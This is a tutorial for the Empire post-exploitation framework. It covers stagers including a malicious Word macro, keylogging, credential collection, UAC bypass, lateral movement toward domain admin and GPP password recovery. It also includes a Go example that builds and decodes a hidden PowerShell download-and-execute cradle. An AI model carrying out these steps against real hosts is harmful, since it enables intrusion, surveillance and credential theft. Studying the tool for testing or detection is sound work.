Installation
Clone the repository with git:
git clone https://github.com/EmpireProject/Empire.git
Then enter the setup directory and run the installer:
cd Empire
cd setup
sudo ./install.sh
After the installer finishes, starting Empire with ./empire may still fail with a traceback like the one below, because the installer does not always pull in every Python dependency:
Traceback (most recent call last):
File "./empire", line 13, in <module>
from lib.common import empire, helpers
File "/root/Empire/lib/common/__init__.py", line 8, in <module>
import helpers
File "/root/Empire/lib/common/helpers.py", line 50, in <module>
import iptools
ImportError: No module named iptools
iptools is only the first missing import Empire hits; several packages are missing. Install them with pip (Python 2's pip: the implicit relative import "import helpers" in the traceback shows this is the Python 2 code base):
pip install iptools
pip install pydispatch
pip install netifaces
pip install pydispatcher
pip install zlib_wrapper
pip install xlrd
pip install macholib
pip install xlutils
pip install pyminifier
pip install dropbox
Once they are installed, run the reset script, which re-initialises Empire's database:
cd setup/
sudo ./reset.sh
Usage
Setting up a listener
Empire works on the same principle as Metasploit with Meterpreter: first start a listener, then generate a stager (the "Trojan" of the original article), run the stager on the target host, and the agent it spawns connects back to the listener.
Type listeners to enter the listener menu, then uselistener to choose a listener type; type uselistener followed by a space and press Tab twice to see the available types.
Here the http listener is used. Enter info to view its options,
use set to set the ones you need (for example Name and Port), and then execute to start listening.
Use list to list the currently active listeners.
Use kill <name> to delete a listener.
When several listeners are running at once, each must have a distinct name and a distinct port.
Generating a stager
With the listener running, generate a stager and run it on the target machine. Just as Metasploit offers many payloads, Empire offers many modular stagers; type usestager, then a space, and press Tab twice to list them (26 in the version used here).
- DLL stager
usestager windows/dll
Enter info to view the options, set them (at least Listener), and run execute; the DLL is written to /tmp (launcher.dll by default). When the DLL is loaded on the target host, the agent checks in.
- Launcher one-liner
If all you need is a one-line command, no stager module is required: from the listener menu type launcher <language> <listenerName>
and Empire immediately prints a base64-encoded PowerShell command. Here, enter back to return to the listener menu, then launcher powershell test (test being the listener name set above) to generate the payload.
Run the generated command in PowerShell on the target machine and you get an agent on that host.
In the screenshot two hosts are now online.
Enter agents to see the details of each online host.
Use rename to change an agent's name.
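The one-liner that launcher powershell prints is a powershell.exe command line whose -enc (-EncodedCommand) argument carries the script as UTF-16LE text, base64-encoded, next to switches such as -noP and -w 1 that keep it quiet. The Go program below is an added example, not code from the original article or from Empire: it builds such a command line from a constructed stand-in script and decodes it back, which is also the decoding a defender applies when an encoded command turns up in process-creation logs. The stand-in script and the simplified switch-prefix matching are assumptions made for the illustration, not Empire's real launcher text.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Launcher is what can be recovered from a "powershell ... -enc <base64>" command line.
type Launcher struct {
	Script    string // the decoded PowerShell script
	NoProfile bool   // -NoProfile (-noP): profile scripts are skipped
	Hidden    bool   // -WindowStyle hidden (-w 1): no visible console window
}

// matchesSwitch reports whether arg (e.g. "-noP") is a prefix of the full switch
// name; powershell.exe resolves abbreviated switches this way. Ambiguity between
// switches that share a prefix is ignored here (assumption for this example).
func matchesSwitch(arg, full string) bool {
	a := strings.ToLower(strings.TrimLeft(arg, "-/"))
	return a != "" && strings.HasPrefix(full, a)
}

// utf16leToString converts the raw bytes of an encoded command back to text.
func utf16leToString(b []byte) (string, error) {
	if len(b)%2 != 0 {
		return "", errors.New("odd byte count: not UTF-16LE")
	}
	u := make([]uint16, len(b)/2)
	for i := range u {
		u[i] = binary.LittleEndian.Uint16(b[2*i:])
	}
	return string(utf16.Decode(u)), nil
}

// EncodeCommand produces the value powershell.exe expects after -EncodedCommand:
// the script as UTF-16LE, then standard base64 with '=' padding.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	b := make([]byte, 2*len(u))
	for i, c := range u {
		binary.LittleEndian.PutUint16(b[2*i:], c)
	}
	return base64.StdEncoding.EncodeToString(b)
}

// DecodeLauncher walks a powershell.exe command line, notes the switches that
// make the launcher quiet, and decodes the -EncodedCommand argument.
func DecodeLauncher(cmdline string) (Launcher, error) {
	var l Launcher
	args := strings.Fields(cmdline)
	for i := 0; i < len(args); i++ {
		a := args[i]
		if !strings.HasPrefix(a, "-") && !strings.HasPrefix(a, "/") {
			continue
		}
		switch {
		case matchesSwitch(a, "noprofile"):
			l.NoProfile = true
		case matchesSwitch(a, "windowstyle") && i+1 < len(args):
			v := strings.ToLower(args[i+1])
			l.Hidden = v == "1" || v == "hidden" // 1 is the numeric form of Hidden
			i++
		case matchesSwitch(a, "encodedcommand") && i+1 < len(args):
			raw, err := base64.StdEncoding.DecodeString(args[i+1])
			if err != nil {
				return l, fmt.Errorf("%s argument is not valid base64: %w", a, err)
			}
			s, err := utf16leToString(raw)
			if err != nil {
				return l, err
			}
			l.Script = s
			i++
		}
	}
	if l.Script == "" {
		return l, errors.New("no -EncodedCommand argument found")
	}
	return l, nil
}

func main() {
	// Constructed stand-in for a stage-zero script; this is NOT Empire's launcher text.
	script := "$wc=New-Object Net.WebClient;IEX $wc.DownloadString('http://127.0.0.1:8080/index.asp')"
	cmdline := "powershell -noP -sta -w 1 -enc " + EncodeCommand(script)
	fmt.Println(cmdline)

	l, err := DecodeLauncher(cmdline)
	if err != nil {
		panic(err)
	}
	fmt.Printf("NoProfile=%v Hidden=%v\nScript: %s\n", l.NoProfile, l.Hidden, l.Script)
}
```

The same decoding applies to any process-creation event whose command line contains -EncodedCommand or one of its abbreviations; the combination of a hidden window, no profile and an encoded script is what makes this launcher easy to spot in logs even though the script itself is opaque.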
- launcher_vbs stager
From the listener menu enter usestager windows/launcher_vbs, then info to view the options.
Set the Listener option and execute; by default launcher.vbs is written to /tmp.
Enter back to return to the listener menu, where the listener is still running. When launcher.vbs is opened on the target machine, you get an agent on that host.
- launcher_bat stager
usestager windows/launcher_bat
By default this writes launcher.bat to /tmp; run it on the target machine and you get an agent on that host.
- Macro stager
usestager windows/macro
By default the macro text is written to /tmp. It then has to be placed in an Office document: open a Word document, click the "View" tab, click "Macros", click "View Macros", give the macro a name and click "Create".
The VBA editor opens. Delete the code it pre-fills, paste in the generated macro, and
save the document as a "Word 97-2003 Document (*.doc)" file. When the document is opened on the target machine with macros enabled, you get an agent on that host.
Connecting to a host and basic use
Once the target host has called back, the agents command lists the connected hosts; an asterisk marks an agent that is already running elevated (high integrity).
Use interact <agentName> to connect to a host.
Enter help agentcmds to see the commonly used agent commands.
To run a cmd.exe command, prefix it with shell, i.e. shell <command>.
As in Metasploit, the creds command collects and sorts the credentials obtained so far.
Collecting information
Empire is mainly a post-exploitation tool, so the information collection modules are the ones used most. Use searchmodule <keyword> to search for modules; to see the full collection list, type usemodule collection/ and press Tab.
- Screenshot
usemodule collection/screenshot
- Keylogger
usemodule collection/keylogger
Once it runs, the keystrokes typed on the target can be read in Empire; they are also written automatically to
Empire/downloads/<AgentName>/agent.log
- Clipboard monitor
usemodule collection/clipboard_monitor
After execution the clipboard contents are shown.
- Find shares
usemodule situational_awareness/network/powerview/share_finder
- Collect information about the target host
usemodule situational_awareness/host/winenum
Shows local users, domain group members, last password set time, clipboard contents, basic system information, network adapter information, shares, etc.
usemodule situational_awareness/host/computerdetails
Enumerates almost all useful information on the system: event logs, application control policy logs, RDP logon information, records of PowerShell scripts run and saved, etc.
- ARP scan
usemodule situational_awareness/network/arpscan
The Range option must be set here.
- DNS information
In an internal network, knowing the hostname and IP address of every machine is essential for understanding the network layout.
usemodule situational_awareness/network/reverse_dns
usemodule situational_awareness/host/dnsserver    # shows the IP address of the internal DNS server
- Find the servers domain admins are logged on to
One way to obtain domain admin rights is to find the machine where a domain admin is logged on, move laterally to it and steal the domain admin credentials, which gives control of the whole domain.
usemodule situational_awareness/network/powerview/user_hunter
- Find hosts where the current user has local admin access
usemodule situational_awareness/network/powerview/find_localadmin_access
- Get the domain controller
usemodule situational_awareness/network/powerview/get_domain_controller
Privilege escalation
- Bypass UAC
Here the agent Test from the screenshot is elevated.
usemodule privesc/bypassuac
Set the Listener option and execute. A new agent calls back, and in the agents list it carries the asterisk that marks an elevated agent.
- bypassuac_wscript
bypassuac_wscript uses C:\Windows\wscript.exe to run the payload, bypassing UAC so that the payload runs with administrator privileges; it only works against Windows 7 targets.
usemodule privesc/bypassuac_wscript
- PowerUp
Empire bundles the PowerUp checks for local privilege escalation, covering Windows misconfigurations, vulnerable Windows services, AlwaysInstallElevated and other methods (8 in total). Type usemodule privesc/powerup/ and press Tab to see the full PowerUp list.
- GPP
Domains often use Group Policy Preferences (GPP) to set local account passwords, which is convenient for managing and deploying images. The drawback is that any ordinary domain user can read the deployment files from SYSVOL on the domain controller. The password (the cpassword attribute) is AES-256 encrypted, but Microsoft published the key, so anyone who can read the file can decrypt it.
usemodule privesc/gpp
Run the module to recover the passwords.